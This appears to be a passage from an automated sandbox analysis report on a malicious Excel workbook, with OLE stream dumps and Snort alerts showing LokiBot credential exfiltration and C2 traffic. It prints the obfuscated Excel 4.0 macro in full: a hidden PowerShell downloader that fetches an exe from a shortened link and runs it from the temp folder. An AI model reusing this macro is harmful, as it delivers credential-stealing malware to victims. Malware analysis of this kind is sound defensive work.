                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 b0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 8b 00 00 00 02 00 00 00 e4 04 00 00
                                                                                        Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                                                                        General
                                                                                        Stream Path:\x5SummaryInformation
                                                                                        File Type:data
                                                                                        Stream Size:4096
                                                                                        Entropy:0.190042678721
                                                                                        Base64 Encoded:False
                                                                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . h . . . . . . . . . . . 0 . . . . . . . 8 . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . . . . . . . . . . . . . D e l l . . . . @ . . . . L . z . . . . @ . . . . . . . n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                        Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 68 00 00 00 05 00 00 00 01 00 00 00 30 00 00 00 08 00 00 00 38 00 00 00 0c 00 00 00 48 00 00 00 0d 00 00 00 54 00 00 00 13 00 00 00 60 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 08 00 00 00 44 65 6c 6c 00 00 00 00 40 00 00 00 00 4c f7 7a
                                                                                        Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 116784
                                                                                        General
                                                                                        Stream Path:Workbook
                                                                                        File Type:Applesoft BASIC program data, first line number 16
                                                                                        Stream Size:116784
                                                                                        Entropy:7.53092053212
                                                                                        Base64 Encoded:True
                                                                                        Data ASCII:. . . . . . . . T 8 . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . D e l l B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p ^ ) 8 . . . . . . . X . @ . .
                                                                                        Data Raw:09 08 10 00 00 06 05 00 54 38 cd 07 c9 00 02 00 06 07 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 04 00 00 44 65 6c 6c 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                                                                        Macro 4.0 Code

                                                                                        =ERROR(FALSE),,,,,,,,,"=GET.CELL(5,M583)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 (nEw-oB`jecT Ne""&CHAR(116)&CHAR(46)&CHAR(87)&CHAR(101)&""bcLIENt).('Do""&CHAR(119)&""n'+'loadFile').In""&CHAR(118)&""oke('""&CHAR(104)&""ttps://cutt.ly/qjdJoz4','12""&CHAR(46)&""exe')"")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item """"12""&CHAR(46)&""exe"""" -Destination """"${enV`:temp}"""""")",,,,,,,,,"=EXEC(""c""&CHAR(109)&""d /c ""&CHAR(D117)&""o^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12""&CHAR(46)&""exe')"")",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,

                                                                                        Network Behavior

                                                                                        Snort IDS Alerts

                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                        01/05/21-19:05:22.500040TCP2021697ET TROJAN EXE Download Request To Wordpress Folder Likely Malicious4916780192.168.2.2283.172.144.37
                                                                                        01/05/21-19:06:07.649980TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2025381ET TROJAN LokiBot Checkin4916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:07.649980TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2024312ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M14916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2025381ET TROJAN LokiBot Checkin4916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.163209TCP2024317ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M24916980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2025381ET TROJAN LokiBot Checkin4917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.473302TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.645122TCP2025483ET TROJAN LokiBot Fake 404 Response8049170185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:08.887025TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2025381ET TROJAN LokiBot Checkin4917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:08.887025TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.065680TCP2025483ET TROJAN LokiBot Fake 404 Response8049171185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:09.279376TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2025381ET TROJAN LokiBot Checkin4917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.279376TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.462394TCP2025483ET TROJAN LokiBot Fake 404 Response8049172185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:09.669670TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2025381ET TROJAN LokiBot Checkin4917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.669670TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:09.843837TCP2025483ET TROJAN LokiBot Fake 404 Response8049173185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.067266TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2025381ET TROJAN LokiBot Checkin4917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.067266TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.236854TCP2025483ET TROJAN LokiBot Fake 404 Response8049174185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.499611TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2025381ET TROJAN LokiBot Checkin4917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.499611TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.673143TCP2025483ET TROJAN LokiBot Fake 404 Response8049175185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:10.888136TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2025381ET TROJAN LokiBot Checkin4917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:10.888136TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.065621TCP2025483ET TROJAN LokiBot Fake 404 Response8049176185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:11.296993TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2025381ET TROJAN LokiBot Checkin4917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.296993TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.461579TCP2025483ET TROJAN LokiBot Fake 404 Response8049177185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:11.686950TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2025381ET TROJAN LokiBot Checkin4917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.686950TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:11.871413TCP2025483ET TROJAN LokiBot Fake 404 Response8049178185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.075634TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2025381ET TROJAN LokiBot Checkin4917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.075634TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24917980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.243051TCP2025483ET TROJAN LokiBot Fake 404 Response8049179185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.449877TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2025381ET TROJAN LokiBot Checkin4918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.449877TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.609106TCP2025483ET TROJAN LokiBot Fake 404 Response8049180185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:12.832799TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2025381ET TROJAN LokiBot Checkin4918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.832799TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:12.987731TCP2025483ET TROJAN LokiBot Fake 404 Response8049181185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:13.213064TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2025381ET TROJAN LokiBot Checkin4918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.213064TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.388159TCP2025483ET TROJAN LokiBot Fake 404 Response8049182185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:13.606387TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2025381ET TROJAN LokiBot Checkin4918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.606387TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:13.778989TCP2025483ET TROJAN LokiBot Fake 404 Response8049183185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.002546TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2025381ET TROJAN LokiBot Checkin4918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.002546TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.168912TCP2025483ET TROJAN LokiBot Fake 404 Response8049184185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.391399TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2025381ET TROJAN LokiBot Checkin4918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.391399TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.558086TCP2025483ET TROJAN LokiBot Fake 404 Response8049185185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:14.788464TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2025381ET TROJAN LokiBot Checkin4918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.788464TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918680192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:14.954180TCP2025483ET TROJAN LokiBot Fake 404 Response8049186185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.165872TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2025381ET TROJAN LokiBot Checkin4918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.165872TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918780192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.352806TCP2025483ET TROJAN LokiBot Fake 404 Response8049187185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.552401TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2025381ET TROJAN LokiBot Checkin4918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.552401TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918880192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.734059TCP2025483ET TROJAN LokiBot Fake 404 Response8049188185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:15.960354TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2025381ET TROJAN LokiBot Checkin4918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:15.960354TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24918980192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.139385TCP2025483ET TROJAN LokiBot Fake 404 Response8049189185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.358508TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2025381ET TROJAN LokiBot Checkin4919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.358508TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919080192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.531882TCP2025483ET TROJAN LokiBot Fake 404 Response8049190185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:16.795879TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2025381ET TROJAN LokiBot Checkin4919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.795879TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919180192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:16.967213TCP2025483ET TROJAN LokiBot Fake 404 Response8049191185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.183871TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2025381ET TROJAN LokiBot Checkin4919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.183871TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919280192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.344388TCP2025483ET TROJAN LokiBot Fake 404 Response8049192185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.566777TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2025381ET TROJAN LokiBot Checkin4919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.566777TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919380192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.726876TCP2025483ET TROJAN LokiBot Fake 404 Response8049193185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:17.949146TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2025381ET TROJAN LokiBot Checkin4919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:17.949146TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24919480192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.134410TCP2025483ET TROJAN LokiBot Fake 404 Response8049194185.206.215.56192.168.2.22
                                                                                        01/05/21-19:06:18.364453TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14919580192.168.2.22185.206.215.56
                                                                                        01/05/21-19:06:18.364453TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4919580192.168.2.22185.206.215.56
